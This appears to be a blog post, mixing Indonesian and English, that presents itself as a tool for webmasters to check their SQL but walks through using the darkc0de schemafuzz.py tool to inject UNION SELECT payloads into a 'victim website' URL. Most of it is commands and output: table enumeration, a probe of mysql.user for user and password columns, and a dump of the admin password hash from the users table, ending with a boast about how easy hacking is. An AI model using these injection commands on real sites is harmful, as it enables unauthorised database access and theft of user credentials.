Bagi anda yang berprofesi sebagai webmaster, silahkan download file ini, untuk nguji apa ada kesalahan sql anda, setelah yakin tak ada kesalahan barulah di upload.
nah tool nya gak besar kok bisa di dapat di
http://rs344.rapidshare.com/files/171947021/schemafuzz.rarSemoga itu berguna... untuk menggunaknya bisa baca manual berikut ini.
http://www.darkc0de.com/tutorials/schemafuzz.rar
schemafuzz.py-u "http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de, 2,3,4,5" - schema-D namadatabasenya
. / schemafuzz.py-u "http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de, 2,3,4,5" - schema-D webthings
[+] URL: http://127.0.0.1/ + AND +1 = 2 + UNION + SELECT +0, darkc0de ,2,3,4,5 --
[+] Evasion Used: "+" "-"
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration ...
Database: webthings
User: @ localhost testing
Version: 5.0.51a
[+] Showing Tables & Columns from database "webthings"
[+] Number of Tables: 33
[Database]: webthings
[Table: Columns]
[0] wt_articles: cod, article_id, Subtitle, page, text, text_ori, htmlarticle, views
[1] wt_articles_title: article_id, category, title, active, date, userid, views
[2] wt_articlescat: cod, category
[3] wt_banners: cod, name, active, image, url_image, url, code, views, clicks, period, start_date, end_date
[4] wt_banners_log: banner, date, views, clicks, sessions
[5] wt_banners_rawlog: banner, type, date, session
[6] wt_centerboxes: cod, mail, active, oneverypage, menuoption, title, content, file, type, draw_box
[7] wt_comments: cod, type, link, date, userid, comment
[8] wt_config: id, config
[9] wt_downloads: id, category, name, active, url, date, size, count, rate_sum, rate_count, short_description, description, small_picture, big_picture, AUTHOR_NAME, author_email, comments, url_screenshot, license, license_text
[10] wt_downloadscat: cod, ref, name, descr
[11] wt_faq: cod, topic, uid, active, question_ori, question, answer_ori, answer
[12] wt_faq_topics: cod, name
[13] wt_forum_log_topics: uid, msgid, logtime, notifysent
[14] wt_forum_msgs: cod, forum, msg_ref, date, userid, title, text_ori, date_der, views, closed, sticky, modifiedtime, modifiedname, notifies
[15] wt_forums: cod, title, descr, locked, notifies, register
[16] wt_forums_mod: forum, userid, type
[17] wt_guestbook: id, datum, naam, email, homepage, plaats, tekst
[18] wt_links: id, category, active, name, url, count, descr, Obs
[19] wt_linkscat: cod, name, descr, parent_id
[20] wt_menu: id, mail, title, url, type, Newwindow, lang
[21] wt_news: cod, lang, category, catimgpos, date, title, userid, image, align, active, counter, text, text_ori, full_text, full_text_ori, Archived, sidebox, sideboxtitle, sideboxpos
[22] wt_newscat: cod, name, image
[23] wt_online: id, time, uid
[24] wt_picofday: id, category, userid, small_picture, big_picture, description, full_description, views, clicks
[25] wt_picofdaycat: id, name, description
[26] wt_picofdaysel: date, picture_id, views, clicks
[27] wt_polls: cod, dtstart, dtend, question, item01, item02, item03, item04, item05, item06, item07, item08, item09, item10, count01, count02, count03, count04, count05, count06, count07, count08, count09 , count10
[28] wt_sideboxes: cod, post, side, active, title, content, file, type, function, modules
[29] wt_user_access: userid, module
[30] wt_user_book: userid, cod_user
[31] wt_user_msgs: cod, userid, folder, date, user_from, title, msg_read, text, Notify
[32] wt_users: uid, name, password, class, realname, email,
newsposted, commentsposted, faqposted, topicsposted, dateregistered, dateactivated, lastvisit, logins, newemail, newemailsess, avatars, lang, theme, signature, banned, msn, showemail
[-] [01:43:48]
[-] Total URL Requests 270
[-] Done
to see if we can load_file in the site use this command
. / schemafuzz.py-u "http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de, 2,3,4,5" - info
it will appear like this
[+] URL: http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de ,2,3,4,5 --
[+] Evasion Used: "+" "-"
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration ...
Database: webthings
User: @ localhost testing
Version: 5.0.51a
[+] Do we have Access to MySQL Database: Yes <- w00t w00t
[!] Http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, concat (user, 0x3a, password), 2,3,4, 5 + FROM + mysql.user---
[+] Do we have to Load_File Access: No
[-] [01:46:51]
[-] Total URL Requests 3
[-] Done
that we can load_file but I can access the database to mysqlnya hehehe
to know that there are several databases on the site, we use a command like this
. / schemafuzz.py-u "http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de, 2,3,4,5" - DBS
will appear like this
[+] URL: http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de ,2,3,4,5 --
[+] Evasion Used: "+" "-"
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration ...
Database: webthings
User: @ localhost testing
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0]? Webthings?
[-] [01:58:17]
[-] Total URL Requests 30
[-] Done
next steps
--------------------
. / schemafuzz.py-u "http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de, 2,3,4,5" - dump webthing-D-T-C wt_users name, password
[+] URL: http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de ,2,3,4,5 --
[+] Evasion Used: "+" "-"
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration ...
Database: webthings
User: @ localhost testing
Version: 5.0.51a
[+] Dumping data from database "webthings" Table "wt_users"
[+] Column (s) [ 'name', 'password']
[+] Number of Rows: 2
[0] admin: e00b29d5b34c3f78df09d45921c9ec47:
[-] [02:08:48]
[-] Total URL Requests 4
[-] Done
Begitulah, sungguh mudah menjadi hacker yax.. apa kah hacking itu semudah itu ? em.. tak taulah yang jelas gak ada yang sulit brother.. gak ada yang sulit kalo kalian mau.
Am not hacker but am will be a real hacker :)
0 komentar:
Posting Komentar